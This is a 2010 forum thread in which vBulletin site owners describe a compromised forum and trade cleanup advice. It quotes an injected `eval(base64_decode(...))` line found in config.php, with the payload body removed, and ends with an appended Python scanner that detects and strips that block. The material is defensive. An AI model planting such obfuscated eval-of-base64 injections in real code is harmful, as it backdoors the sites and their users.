HELP...My forum has been infected with a virus
nkmsw8
05-07-2010, 01:07 PM
I have been running this forum for about two years now and early this morning I was notified that I had a virus or that my forum was hacked. The website is floridaconcealedcarry.com/Forum/index.php.
I can't login to it and don't know where to start as far as correcting this. I was set to upgrade to the new 4.0 software in a few days and so this is devastating for me.
Thanks
borbole
05-07-2010, 01:24 PM
First off, I would advise anyone against clicking the link to the infected forum for security reasons.
That said, try to do a clean up of all your vb files by overwriting them with a fresh set from the vb package, your version. Then do another thorough checkup of all your server space and database and if everything is ok upgrade to the latest version. Also change all the passwords for your admin, ftp, cp etc. And last but not least, inform your host about this so they can check their logs and see how exactly they got in.
Lynne
05-07-2010, 01:28 PM
Can you ftp to your site? If so, replace all the files with totally default files and remove any non-vbulletin files.
Have you talked to your host? They may be able to help figure out how this happened.
nkmsw8
05-07-2010, 01:29 PM
Thanks for the advice. I will be doing these things now.
--------------- Added 1273245301 at 1273245301 ---------------
I have gone ahead and changed my FTP password but I cannot access my CP or Admin. I will download the entire site from the server onto my computer in a secure sandbox. However, how can I save the user data from these files? My oldest backup is weeks old.
Thanks.
borbole
05-07-2010, 02:19 PM
That data is stored at the db and not in the php files. Try to clean them up as suggested above and see if it would help.
nkmsw8
05-07-2010, 07:22 PM
Thanks for all your help. The forum is now back up and running. I re-installed all the PHP files and that took care of the problem.
Thanks
borbole
05-07-2010, 07:29 PM
Glad to hear that. Did you also upgrade to the latest version? Also don't forget to inform your host about it so they can investigate things on their end as well.
nkmsw8
05-07-2010, 10:58 PM
I was digging around in my config.php file while changing the db password and I found this code at the top of the file.
<?php /**/ eval(base64_decode("[long base64-encoded payload removed]"));?>
Should this be there?
borbole
05-07-2010, 11:21 PM
No, that code should be deleted. If I were you I would also thoroughly check my server space for anything out of the ordinary. It would be best if you checked all the other non-vB .php files that you might have, for example from another script like WordPress.
nkmsw8
05-07-2010, 11:31 PM
Will do. Thanks :up:
--------------- Added 1273286835 at 1273286835 ---------------
How many different places in the vBulletin software do you have to update the db password when it's changed on the db server? I'm getting a db error after I updated the password on the db and the config.php file.
Angel-Wings
05-08-2010, 04:02 AM
Changing it in config.php is enough. But did you reinstall everything, and I really mean everything?
If the machine has been "hacked" once, how can you ensure nothing has been modified and that you can trust an installed "security tool" any longer?
Do backups before of course :)
Marco van Herwaarden
05-08-2010, 12:54 PM
If there are modified files, like in your case the config.php, then the attacker most likely has not used vBulletin to enter your file system.
Most likely you are on a vulnerable server. Please contact your host and place a fresh copy of all files once your host has secured the server.
John59
05-18-2010, 08:29 AM
Hi to all
I have the same problem.
It all started on the first of May.
I cleaned and restored everything to a month ago, except the database
and attachments (mainly photos, no programs or any code).
The problem keeps coming back every 4 - 5 days: all .php files are modified
or some deleted. The first time it happened I also had the above code in all .php
files.
I contacted my host and they just keep giving me advice on how to check and secure
my code (VB in my case), and they do nothing.
I have also come to believe that the problem is a host security problem.
Do you think that if I change host (since they do not seem to accept that it is a host security problem and investigate; they are doing nothing to help, just polite talk and advice)
my problems will be over?
P.S. I know nothing about programming and .PHP,
only how to upload and use VB (3 years' experience).
borbole
05-18-2010, 02:35 PM
Well, in that case then you will be better off with another host who takes security more seriously.
nkmsw8
05-18-2010, 02:49 PM
Change all your passwords also. Hosting password, FTP password, Database password, and your Hosting company account login password.
John59
05-18-2010, 08:31 PM
Already did that days ago.
The problem keeps coming back every 4-5 days. As was mentioned, it seems like the only solution is to change host.
maidos
05-21-2010, 04:13 AM
I'm curious, are you possibly using DreamHost or GoDaddy and using WordPress for your site?
My friend has the same encrypted virus, which kept popping up till I removed the code for him... but if it's the mentioned host, you should move away.
John59
05-21-2010, 05:11 AM
No i am not using wordpress
And yes my host is one of the above
daveaite
05-21-2010, 08:38 AM
The issue could have begun if you installed some "nulled" scripts. Always a bad idea, as the people who null them implant ways to get into your server within those scripts.
maidos
05-21-2010, 12:01 PM
In this case, I very much doubt it, since GoDaddy and DreamHost got their servers compromised and they admit it, so millions of websites got reported injected with that virus site.
http://www.wpsecuritylock.com/ninoplas-base64-wordpress-hacked-on-godaddy-case-study/
Even if you don't run WordPress, that site has pretty good tips on how to secure your account with GoDaddy.
--------------- Added 1274447260 at 1274447260 ---------------
And a good person posted a script to remove the infected code on all files:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
John59
05-25-2010, 10:06 PM
Thank you all. I did what you suggested and it looks like my forum is clean, 5 days now with no problem.
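A minimal scanner for the check advised in this thread (go through every .php file looking for the `<?php /**/ eval(base64_decode(` block that was found at the top of config.php), given here as an added example; it is not part of the original posts and is not the Sucuri script linked above. The sample tree, the stand-in base64 string and the `.infected` backup suffix are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# Shape quoted in the thread: <?php /**/ eval(base64_decode("...."));?>
# The base64 body is matched loosely (whitespace tolerated) and is never decoded or run.
INJECTED = re.compile(
    rb'\A\s*<\?php\s*/\*\*/\s*eval\s*\(\s*base64_decode\s*\(\s*'
    rb'(["\'])[A-Za-z0-9+/=\s]+\1\s*\)\s*\)\s*;\s*\?>')

def strip_injection(data: bytes) -> tuple[bytes, bool]:
    """Return (cleaned bytes, True) when the leading injected block is present."""
    cleaned, n = INJECTED.subn(b"", data, count=1)
    return cleaned, bool(n)

def scan(root: Path, fix: bool = False) -> list[Path]:
    """List .php files under root that start with the injected block.
    With fix=True, keep a .infected copy as evidence and write the cleaned file."""
    hits = []
    for path in sorted(root.rglob("*.php")):
        data = path.read_bytes()
        cleaned, found = strip_injection(data)
        if not found:
            continue
        hits.append(path)
        if fix:
            path.with_name(path.name + ".infected").write_bytes(data)
            path.write_bytes(cleaned)
    return hits

def demo() -> tuple[list[str], bytes]:
    """Constructed sample tree: one clean file, one with a harmless stand-in blob."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "includes").mkdir()
        blob = b"Y29uc3RydWN0ZWQgc2FtcGxl"  # constructed; decodes to plain text
        legit = b"<?php\n$config['Database']['dbname'] = 'forum';\n"  # constructed
        (root / "includes" / "config.php").write_bytes(
            b'<?php /**/ eval(base64_decode("' + blob + b'"));?>' + legit)
        (root / "index.php").write_bytes(b"<?php\nrequire './global.php';\n")
        hits = scan(root, fix=True)
        names = [p.relative_to(root).as_posix() for p in hits]
        return names, (root / "includes" / "config.php").read_bytes()

if __name__ == "__main__":
    print(demo())
```

Pattern-based cleanup only removes this one known shape; replacing files from a fresh package and having the host find the entry point, as the replies advise, still applies.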